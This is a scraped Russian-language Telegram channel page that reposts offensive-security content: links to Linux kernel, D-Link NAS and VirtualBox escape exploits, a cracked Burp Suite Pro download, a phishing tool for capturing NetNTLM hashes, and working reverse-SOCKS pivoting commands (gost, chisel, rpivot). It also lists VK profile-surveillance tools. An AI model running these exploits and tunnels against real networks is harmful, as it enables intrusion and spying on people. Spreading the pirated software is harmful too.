Канал ламера


Channel's geo and language: Russia, Russian
Category: Technologies


Сборник полезной информации по информационной безопасности, авторским статьям, сливам и обзорам хак-софта с ведущих IT-каналов в ТГ. Подписывайся, ну либо пропускай все самое интересное.

Related channels

Channel's geo and language
Russia, Russian
Statistics
Posts filter


Forward from: Kingsman
Burp Suite Professional Edition v2024.3.1.1.zip
624.4Mb
Burp Suite Professional Edition
Version 2024.3.1.1
Full Activated + Extensions

👉 Follow: Kingsman




Forward from: Net Survivalist
Тут небольшая подборка веб-сервисов для передачи файлов без установки отдельного приложения нак омпьютер или смартфон. По болей части они свободно распространяемые и могут работать в виде сервиса, так и могут быть развернуты где-нибудь на вашем железе в закрытом контуре.

- [Web Wormhole](https://webwormhole.io/)
- [ToffeeShare](https://toffeeshare.com/)
- [FilePizza](https://file.pizza/)
- [SnapDrop](https://snapdrop.net/)
- [Instant](https://instant.io/)
- [JustBeamIt](https://www.justbeamit.com/)
- [Yt2fb](https://yt2fb.in/file-transfer/)
- [drop lol](https://drop.lol/)
- [Filepush](https://gitlab.com/kevincox/filepush
- [Wormhole](https://wormhole.app/)
- [Send](https://send.vis.ee/)


Forward from: Волосатый бублик
#lpe #linux #kernel

[ ExploitGSM
]
Exploit for 6.4 - 6.5 kernels

https://github.com/YuriiCrimson/ExploitGSM


Forward from: Kingsman
CVE-2024-3273
*
D-Link NAS version:

DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
DNS-325 Version 1.01
DNS-327L Version 1.09, Version 1.00.0409.2013
DNS-340L Version 1.08

Exploit + Tool

#dlink #exploit #NAS

👉 Follow: Kingsman


Forward from: Codeby Pentest
🔎 Взлом паролей WPA2-PSK с помощью Cowpatty

Добрый вечер, друзья!

В этой статье представляется новый инструмент для взлома паролей WPA2-PSK - coWPAtty, разработанный Джошуа Райтом. Утилита упрощает гибридные/словарные атаки, облегчая и ускоряя процесс взлома. Читайте понятное руководство по использованию этого инструмента, дополняющее предыдущие методы, такие как aircrack-ng.

✅ Читать статью


Forward from: w3b pwn
tribeofhackersredteam_tribalknowledgefromthebestinoffensivecybersecurity.pdf
11.6Mb
Книжка - ответы на вопросы про редтим от редтимеров с более чем 20+ стажем работающих на NAVY, FBI, The Vault, U.S. Army и других прикольных хацкеров.

Интересненько было по ключевым словам пробежаться, почитать

#Redteam




Forward from: road to OSCP
Атаки на Active Directory, злоупотребляя делегированием Kerberos

https://hadess.io/pwning-the-domain-kerberos-delegation/


Forward from: road to OSCP
Атаки на Active Directory с учетными данными

https://hadess.io/pwning-the-domain-with-credentials/


Forward from: road to OSCP
Атаки на Active Directory без учетных данных

https://hadess.io/pwning-the-domain-credentialess-username/


Forward from: Cybred
https://github.com/sensepost/mail-in-the-middle

Mail in the Middle — скрипт для промышленного шпионажа и фишинга, с помощью которого можно автоматизировать целевые атаки на сотрудников.

Принцип использования заключается в следующем:
1. Зарегистрировать много доменов компании с опечатками (можно использовать dnstwist)
2. Настроить MX-записи на свой почтовый сервер
3. После того, как любой из сотрудников отправит письмо с ошибкой в написании домена, получить его сообщение и переотправить законному получателю, внедрив полезную нагрузку.

Умеет автоматически:
— заменять обычные ссылки, ссылками с отслеживанием переходов
— инжектить UNC-пути, чтобы перехватывать NetNTLM-хеши (APT28 активно использовала это в связке с Zero Click эксплойтом в Outlook)
— добавлять/изменять вложения собственными файлами
— отправлять алерты в Teams/Discord


Forward from: Some Security Notes
#redteam #persistence #pentests

В статье приведена подробная информация по методам закрепления в целевой системе. Будет полезно юным пентестерам.

https://pentestlab.blog/methodologies/red-teaming/persistence/




Forward from: RedTeam brazzers
Существует много способов построить reverse socks туннель. Давайте рассмотрим 3 самых простых.
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
route add 192.168.0.0 255.255.0.0 1
Всё, теперь залетая в 127.0.0.1:1080 мы вылетим во внутренней сети(proxychains или tsocks кому как удобнее).
Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
gost -L socks5://user:pass@0.0.0.0:1337
На узле А запускаем 2 госта:
./gost -L socks5://user:pass@127.0.0.1:13338&
./gost -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://user:pass@:1337&
всё, теперь подключаемся к порту 13381 на узле D и выходим в DMZ. Как бонус мы установили логин/пароль на socks и повесили порт на сервере B в Интернет.
Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.

Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0

Client side:

python client.py --server-ip --server-port 9999

As a result, a socks4 proxy service will be bound server side on port 1080.

Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:

(B) $ ./chisel server -p 1337 --reverse --socks5 --auth hax0r:'Passw0rd!'
(A) $ nohup ./chisel client --fingerprint --auth hax0r:'Passw0rd!' 8.8.8.8:1337 R:127.0.0.1:1080:socks &
(B) $ proxychains4 -q hacktheplanet.py 10.10.13.37

где 10.10.13.37 - какая-нибудь тачка из внутренней сети
Верно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ




Forward from: Разведка в интернете
Добрый вечер, разведчики! Анализируем страницу ВКонтакте


1. https://regvk.com/id/ — узнаем ID страницы;
2. https://vk.com/app7183114 — позволяет узнать информацию о группе;
3. http://ininterests.com/ — архив страниц ВК, где можно найти информацию об удаленных страницах;
4. https://220vk.com/ — комплексный инструмент для работы с ВК;
5. https://vk.watch/ID/profile — еще один сайт с архивами профилей;
6. https://archive.org/ — стандартный интернет архив, тоже может быть полезен;
7. https://vk.city4me.com/ — слежка за аккаунтом ВК;
8. https://vk.watch/ — комплексный OSINT инструмент;
9. https://t.me/InfoVkUser_bot — проводит анализ друзей профиля.






Forward from: Proxy Bar
Побег из VirtualBox 7.0.10
ДЫрки в virtio-net
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit


#virtualbox #escape

20 last posts shown.